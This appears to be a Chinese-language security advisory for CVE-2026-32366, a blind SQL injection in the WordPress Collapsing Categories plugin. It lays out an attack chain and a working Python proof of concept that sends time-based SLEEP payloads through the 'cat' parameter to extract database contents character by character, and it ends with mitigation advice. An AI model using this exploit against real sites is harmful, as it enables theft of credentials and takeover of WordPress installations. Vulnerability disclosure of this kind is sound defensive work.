CVE-2026-32366 WordPress Collapsing Categories插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-32366

漏洞类型

SQL注入

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Collapsing Categories插件 (robfelty)

漏洞概述

CVE-2026-32366是WordPress Collapsing Categories插件中的一个高危SQL注入漏洞。该插件由robfelty开发，用于在WordPress网站上实现可折叠的分类目录功能。漏洞源于插件在处理用户输入时未能正确过滤或转义特殊字符，导致攻击者可以在SQL查询中注入恶意代码。由于该漏洞属于Blind SQL Injection（盲注）类型，攻击者无法直接看到数据库查询结果，但可以通过观察应用程序的响应时间或行为变化来推断数据库信息。攻击者利用此漏洞可获取数据库中的敏感信息，包括用户凭证、配置数据、文章内容等。CVSS评分8.5，属于高危漏洞，攻击复杂度低且无需用户交互，但需要低权限认证，这使得漏洞具有较高的实际利用价值。

技术细节

该SQL注入漏洞存在于Collapsing Categories插件的参数处理逻辑中。插件在构建SQL查询时，直接将用户可控的输入参数拼接到SQL语句中，而未进行充分的过滤或使用参数化查询。具体而言，攻击者可以通过构造特殊的SQL函数调用作为参数值，如使用SLEEP()或BENCHMARK()等时间函数来判断SQL语句是否执行成功。在盲注攻击中，攻击者通常会使用条件判断语句，如IF()函数，结合时间延迟函数来逐字符猜测数据库中的敏感信息。由于该插件是WordPress的公开插件，任何WordPress注册用户都可以尝试利用此漏洞。攻击者通过发送带有恶意SQL payload的HTTP请求，即可触发漏洞。成功利用后，攻击者可逐步提取数据库中的用户表、配置信息等敏感数据。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的WordPress CMS，并确认是否安装Collapsing Categories插件及其版本（<=3.0.9）

STEP 2

步骤2

访问目标站点：攻击者访问包含插件功能的页面，通常是分类目录页面，找到可注入的参数点

STEP 3

步骤3

构造恶意payload：攻击者构造包含SQL注入代码的请求参数，使用时间延迟函数（如SLEEP()或BENCHMARK()）进行盲注测试

STEP 4

步骤4

验证漏洞：发送恶意请求，观察响应时间是否延迟，确认漏洞存在

STEP 5

步骤5

数据提取：使用条件判断和ASCII函数，通过逐字符猜测的方式提取数据库中的敏感信息，如用户表、配置数据等

STEP 6

步骤6

权限提升或持久化：根据提取到的信息，攻击者可能获取管理凭据，进一步控制整个WordPress系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-32366 - WordPress Collapsing Categories SQL Injection PoC
Blind SQL Injection vulnerability in robfelty Collapsing Categories plugin <= 3.0.9
"""

import requests
import time
import sys

def test_sqli(target_url, payload):
    """
    Test for SQL injection vulnerability
    """
    # Add payload to the vulnerable 'cat' parameter
    params = {
        'cat': payload
    }
    
    start_time = time.time()
    try:
        response = requests.get(target_url, params=params, timeout=10)
        elapsed_time = time.time() - start_time
        return elapsed_time, response
    except requests.exceptions.Timeout:
        return 10.0, None

def extract_data(target_url, query, max_length=50):
    """
    Blind SQL injection to extract data character by character
    """
    extracted = ""
    for pos in range(1, max_length + 1):
        for ascii_val in range(32, 127):
            char = chr(ascii_val)
            # Use SUBSTRING and ASCII functions for blind extraction
            payload = f"-1' OR IF(ASCII(SUBSTRING(({query}),{pos},1))={ascii_val},SLEEP(3),0)-- -"
            elapsed_time, _ = test_sqli(target_url, payload)
            
            if elapsed_time >= 3:
                extracted += char
                print(f"Extracted: {extracted}")
                break
    return extracted

def main():
    target_url = input("Enter target URL (e.g., http://target.com/?): ").strip()
    
    # Test basic SQL injection
    print("[*] Testing basic SQL injection...")
    normal_time, _ = test_sqli(target_url, "1")
    print(f"[+] Normal response time: {normal_time:.2f}s")
    
    # Test with sleep payload
    sleep_payload = "1' AND SLEEP(5)-- -"
    print(f"[*] Testing with SLEEP payload...")
    sleep_time, _ = test_sqli(target_url, sleep_payload)
    print(f"[+] Sleep response time: {sleep_time:.2f}s")
    
    if sleep_time >= 4:
        print("[!] Vulnerability confirmed!")
        
        # Example: Extract WordPress table prefix
        print("[*] Extracting database user...")
        user = extract_data(target_url, "SELECT USER()", 30)
        print(f"[+] Database user: {user}")
    else:
        print("[-] Vulnerability not detected or target is not vulnerable")

if __name__ == "__main__":
    main()

影响范围

Collapsing Categories插件 <= 3.0.9（所有版本）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：暂时禁用存在SQL注入漏洞的Collapsing Categories插件，或使用其他功能相似的安全插件替代；限制WordPress注册用户的权限，避免低权限用户访问可能触发漏洞的页面；启用WordPress的安全防护插件（如Wordfence、Sucuri等）提供实时的攻击检测和阻止；在Web服务器层面配置SQL注入防护规则；增加Web应用日志监控，及时发现异常的SQL注入尝试行为。